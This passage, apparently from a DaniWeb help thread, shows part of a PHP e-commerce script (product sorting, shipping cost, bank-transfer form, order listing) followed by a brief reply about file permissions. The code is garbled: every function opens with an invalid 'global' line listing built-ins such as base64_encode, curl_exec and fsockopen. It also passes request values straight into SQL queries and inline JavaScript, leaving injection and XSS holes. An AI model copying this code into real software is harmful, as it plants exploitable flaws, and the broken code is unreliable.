value="marka.name asc">'._lang_markayaGore.'</option><option value="name asc">'._lang_urunAdinaGore.'</option></select></td><td><span style="color:red;text-decoration:underline; cursor:pointer;" onclick="document.urunsirala.submit();">'._lang_sirala.'</span></td></tr></form></table>'; $out.=jselect('markaID',$_GET['markaID']); $out.=jselect('orderBy',$_GET['orderBy']); return $out;}function jselect($selectid,$dbvalue) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out.="<script language='javascript'>

		   for (var i = 0; i < document.getElementById('$selectid').options.length; i++)

			{	

				if ((document.getElementById('$selectid').options[i].text == '$dbvalue' || document.getElementById('$selectid').options[i].value == '$dbvalue') && '$dbvalue' != '') document.getElementById('$selectid').options[i].selected = true;

			}
		   </script>	

			"; return $out;}function kargoHesapla($ToplamDesi,$randStr) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $Sehir = hq('select city from siparis where randStr = \''.$randStr.'\''); if ($Sehir && $ToplamDesi) {return (hq('select fiyat from kargoDesi where bolgeID = \''.hq('select bolgeID from kargoSehir where plakaID = \''.$Sehir.'\'').'\' AND desiBaslangic < '.$ToplamDesi.' AND desiBitis > '.$ToplamDesi.' order by fiyat desc limit 0,1')); } else return 0;}function generateHavaleForm() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  if (!$_GET['sn']) return; global $siteConfig; $out='<table width="100%"><form method="POST"><tr><th></th><th>'._lang_banka_banka.'</th><th>'._lang_banka_sube.'</th><th>'._lang_banka_hesapNo.'</th><th>'._lang_banka_hesapSahibi.'</th></tr>'; $x = mysql_query('select * from bankaHavale order by bankaAdi'); while ($d = mysql_fetch_array($x)) {$out.='<tr><td><input ID="haveleID_'.$d['ID'].'" type="radio" name="bankaID" value="'.$d['ID'].'"></td><td><label for="haveleID_'.$d['ID'].'">'.$d['bankaAdi'].'</label></td><td><label for="haveleID_'.$d['ID'].'">'.$d['bankaSubeAdi'].' ('.$d['bankaSubeKodu'].')</label></td><td><label for="haveleID_'.$d['ID'].'">'.$d['bankaHesapNo'].'</label></td><td><label for="haveleID_'.$d['ID'].'">- '.$d['bankaKullaniciAdi'].'</label></td></tr>'; } $out.='</table><br><table width="100%"><tr><td><input type="image" src="templates/'.$siteConfig['templateName'].'/images/form_Onayliyorum.gif"></td></tr></form></table>'; if (isset($_POST['bankaID'])) {if ($_SESSION['userID'] == hq("select userID from siparis where randStr = '".$_GET['sn']."'")) { mysql_query("insert into bankaHavaleBildirim values (null,'".$_GET['sn']."',".$_POST['bankaID'].",now())"); $out=_lang_banka_havaleGonderim;}else $out="<script>alert(':)')</script>"; } return $out;}function listOrders() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out ='<table class="sepet" cellpadding=0 cellspacing=2><tr>'; $out.='<th>'._lang_siparis_no.'</th>'; $out.='<th>'._lang_siparis_siparisNo.'</th>'; $out.='<th>'._lang_siparis_tutar.'</th>'; $out.='<th>'._lang_siparis_tarih.'</th>'; $out.='<th>'._lang_siparis_durum.'</th>'; $out.='<th>'._lang_siparis_detaylar.'</th>'; $out.='</tr>'; $filterStatus = ($_GET['status'] ? ' AND durum='.$_GET['status']:''); $q=mysql_query("select * from siparis where durum != 0 AND userID='".$_SESSION['userID']."' $filterStatus"); $i=1; while ($d = mysql_fetch_array($q)) {$class=(!($i%2)?'tr_normal':'tr_alternate');$out.='<tr class="'.$class.'" style="cursor:

Right... Care to elaborate?

Also check the permissions on the files and folders on you site. ideally you want the permissions to be 0644 on files and 0755 on folders.

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts learning and sharing knowledge.